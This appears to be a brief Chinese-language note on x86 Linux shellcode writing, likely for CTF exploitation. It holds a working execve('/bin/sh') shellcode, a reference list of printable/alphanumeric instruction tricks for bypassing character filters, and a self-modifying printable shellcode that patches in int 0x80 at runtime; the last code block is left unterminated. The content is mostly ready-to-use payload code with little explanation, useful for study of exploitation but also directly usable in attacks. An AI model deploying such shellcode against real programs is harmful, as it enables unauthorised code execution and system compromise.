








常见的shellcode思路是利用int 80h陷入软中断,


    /* execve(path='/bin///sh', argv=['sh'], envp=) */
/* push '/bin///sh\x00' */
push 0x68
push 0x732f2f2f
push 0x6e69622f
mov ebx, esp
/* push argument array ['sh\x00'] */
/* push 'sh\x00\x00' */
push 0x1010101
xor dword ptr [esp], 0x1016972
xor ecx, ecx
push ecx /* null terminate */
pop ecx
add ecx, esp
push ecx /* 'sh\x00' */
mov ecx, esp
xor edx, edx
/* call execve() */
push SYS_execve /* 0xb */
pop eax
int 0x80



push/pop eax…
pusha/popa .算术运算:
inc/dec eax…
sub al, 立即数
sub byte ptr [eax… + 立即数], al dl…
sub byte ptr [eax… + 立即数], ah dh…
sub dword ptr [eax… + 立即数], esi edi
sub word ptr [eax… + 立即数], si di
sub al dl…, byte ptr [eax… + 立即数]
sub ah dh…, byte ptr [eax… + 立即数]
sub esi edi, dword ptr [eax… + 立即数]
sub si di, word ptr [eax… + 立即数] .逻辑运算:
and al, 立即数
and dword ptr [eax… + 立即数], esi edi
and word ptr [eax… + 立即数], si di
and ah dh…, byte ptr [ecx edx… + 立即数]
and esi edi, dword ptr [eax… + 立即数]
and si di, word ptr [eax… + 立即数] xor al, 立即数
xor byte ptr [eax… + 立即数], al dl…
xor byte ptr [eax… + 立即数], ah dh…
xor dword ptr [eax… + 立即数], esi edi
xor word ptr [eax… + 立即数], si di
xor al dl…, byte ptr [eax… + 立即数]
xor ah dh…, byte ptr [eax… + 立即数]
xor esi edi, dword ptr [eax… + 立即数]
xor si di, word ptr [eax… + 立即数] .比较指令:
cmp al, 立即数
cmp byte ptr [eax… + 立即数], al dl…
cmp byte ptr [eax… + 立即数], ah dh…
cmp dword ptr [eax… + 立即数], esi edi
cmp word ptr [eax… + 立即数], si di
cmp al dl…, byte ptr [eax… + 立即数]
cmp ah dh…, byte ptr [eax… + 立即数]
cmp esi edi, dword ptr [eax… + 立即数]
cmp si di, word ptr [eax… + 立即数] .转移指令:
push 56h
pop eax
cmp al, 43h
jnz lable <=> jmp lable .交换al, ah
push eax
xor ah, byte ptr [esp] // ah ^= al
xor byte ptr [esp], ah // al ^= ah
xor ah, byte ptr [esp] // ah ^= al
pop eax .清零:
push 44h
pop eax
sub al, 44h ; eax = 0 push esi
push esp
pop eax
xor [eax], esi ; esi = 0



shellcode = '''
/* execve(path='/bin///sh', argv=0, envp=0) */
/* push '/bin///sh\x00' */
push 0x68
push 0x732f2f2f
push 0x6e69622f
push esp
pop ebx
/*rewrite shellcode to get 'int 80'*/
push edx
pop eax
push 0x60606060
pop edx
sub byte ptr[eax + 0x35] , dl
sub byte ptr[eax + 0x35] , dl
sub byte ptr[eax + 0x34] , dl
push 0x3e3e3e3e
pop edx
sub byte ptr[eax + 0x34] , dl
/*set zero to edx*/
push ecx
pop edx
/*set 0x0b to eax*/
push edx
pop eax
xor al, 0x40
xor al, 0x4b
/*foo order,for holding the place*/
push edx
pop edx
push edx
pop edx
shellcode = asm(shellcode) + '\x6b\x40'


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